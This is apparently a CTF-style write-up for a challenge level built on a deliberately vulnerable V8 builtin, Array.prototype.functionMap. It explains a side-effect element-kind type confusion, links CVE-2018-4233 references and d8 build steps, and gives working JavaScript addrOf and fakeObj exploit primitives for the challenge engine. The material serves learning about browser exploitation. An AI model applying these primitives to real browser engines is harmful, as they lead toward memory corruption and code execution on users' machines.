# Level 6

## Problem

Given a vulnerable builtin `Array.prototype.functionMap(func)`:

- It takes a `PACKED_DOUBLE_ELEMENTS` JSArray receiver and a JSFunction argument.
- It `reinterpret_cast`s `elements` to a `FixedDoubleArray`, then for each element `e`:
  - calls the user-supplied JavaScript callback `func` with
    - input: the double element `e`
    - output: any double `o`
  - and stores `o` back into `e`'s original slot.

The callback is a side effect the builtin does not account for: `func` runs arbitrary JavaScript in the middle of the loop, and if it changes the receiver's elements kind (for example by storing an object into the array, which transitions it from `PACKED_DOUBLE_ELEMENTS` to `PACKED_ELEMENTS`), the backing store no longer holds raw doubles, but the builtin keeps reading and writing it as a `FixedDoubleArray`. Reading a slot that now holds a tagged pointer leaks the pointer bits as a double; writing a chosen double into such a slot plants a pointer the VM will later dereference as an object.

## Key Knowledge

- Side-effect-based array element type confusion
  - CVE-2018-4233
  - [saelo/cve-2018-4233: Exploit for CVE-2018-4233, a WebKit JIT optimization bug used during Pwn2Own 2018](https://github.com/saelo/cve-2018-4233)
  - [Attacking Client-Side JIT Compilers (v2)](https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf#page=106)
  - [Pwn2Own 2018 CVE-2018-4233 analysis](https://www.anquanke.com/post/id/244472)
  - Use this technique to construct the Address Of (`addrOf`) and Fake Object (`fakeObj`) primitives.
  - Caveat: the exact layout of a `PACKED_ELEMENTS` slot depends on the V8 version the challenge d8 is built from. With pointer compression (V8 8.0 and later), a slot holds a 32-bit compressed pointer, so one 8-byte double covers two adjacent slots; without it, a slot holds a full 64-bit tagged pointer. Confirm with `%DebugPrint` before relying on a particular bit layout.
- How to build d8 and debug it
  - [Building V8 from source](https://v8.dev/docs/build)
  - [Building V8 with GN](https://v8.dev/docs/build-gn)
  - From those docs: `fetch v8`, `gclient sync`, then `tools/dev/v8gen.py x64.debug` and `ninja -C out.gn/x64.debug d8`. Run d8 with `--allow-natives-syntax` so that `%DebugPrint(arr)` shows the elements kind of the receiver before and after the callback runs.
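The following is an added example, not code from the challenge or from saelo's exploit. It sketches `addrOf` and `fakeObj` on top of the challenge's `Array.prototype.functionMap`, which only exists in the challenge's d8 build; everything about the builtin (that it walks the array index by index, reads each slot through its raw-double view, passes that to the callback, and writes the returned double back through the same view) is an assumption taken from the problem statement. Which iteration observes the confused values, and whether the leaked bits are one 64-bit tagged pointer or two 32-bit compressed pointers, must be confirmed in a debugger. The float/integer conversion helpers are standard JavaScript and work in any engine, so the file loads in Node as well, where the two primitives simply throw because the builtin is absent.

```javascript
'use strict';

// Shared 8-byte buffer for reinterpreting doubles as integers and back.
const buf = new ArrayBuffer(8);
const f64 = new Float64Array(buf);
const u64 = new BigUint64Array(buf);

/** Reinterpret the 8 bytes of a double as an unsigned 64-bit BigInt. */
function f2i(d) { f64[0] = d; return u64[0]; }

/** Reinterpret a 64-bit BigInt as a double, preserving the bit pattern. */
function i2f(i) { u64[0] = BigInt.asUintN(64, i); return f64[0]; }

/** True only inside the challenge's d8 build that ships functionMap. */
function hasVulnBuiltin() {
  return typeof Array.prototype.functionMap === 'function';
}

const NEED_D8 = 'Array.prototype.functionMap is not defined: run inside the challenge d8';

/**
 * addrOf: leak the tagged pointer of `obj` as raw bits.
 * Iteration 0's callback stores `obj` into arr[1], which transitions arr
 * from PACKED_DOUBLE_ELEMENTS to PACKED_ELEMENTS. Assumption: the builtin
 * then reads slot 1 through its FixedDoubleArray view, so the callback for
 * iteration 1 receives obj's tagged pointer reinterpreted as a double.
 */
function addrOf(obj) {
  if (!hasVulnBuiltin()) throw new Error(NEED_D8);
  const arr = [1.1, 2.2, 3.3];           // PACKED_DOUBLE_ELEMENTS
  let call = 0;
  let leaked = 0.0;
  arr.functionMap(function (e) {
    const idx = call++;
    if (idx === 0) {
      arr[1] = obj;                      // side effect: elements kind changes
      // Slot 0 is now a tagged slot; all-zero bits are Smi 0 under any
      // V8 tagging scheme, so returning 0.0 leaves nothing bogus for the GC.
      return 0.0;
    }
    if (idx === 1) leaked = e;           // slot 1 now holds obj's pointer
    return e;                            // write the same bits back unchanged
  });
  return f2i(leaked);                    // caller strips the tag bit(s)
}

/**
 * fakeObj: make arr[1] a tagged pointer of our choosing.
 * After the same transition, returning a double from iteration 1 writes
 * its raw bits into a slot the VM now treats as a tagged pointer.
 * `addr` must already carry the tag bit(s) the target V8 uses, and with
 * pointer compression the 8 bytes also overwrite slot 2 (hypothetical
 * layout, to be verified on the target build). Avoid bit patterns that
 * form a NaN: double arrays may canonicalize those.
 */
function fakeObj(addr) {
  if (!hasVulnBuiltin()) throw new Error(NEED_D8);
  const arr = [1.1, 2.2, 3.3];
  let call = 0;
  arr.functionMap(function (e) {
    const idx = call++;
    if (idx === 0) { arr[1] = {}; return 0.0; }  // transition, keep slot 0 a Smi
    if (idx === 1) return i2f(addr);             // plant raw bits in slot 1
    return e;
  });
  return arr[1];                         // VM now dereferences addr as an object
}
```

Inside the challenge d8, `addrOf(someObject)` returns the raw slot bits as a BigInt and `fakeObj(bits)` hands back whatever the VM finds at that address; the usual next step is to run `%DebugPrint` on the receiver inside the callback to check which iteration actually sees the transitioned backing store before building anything on top of these two primitives.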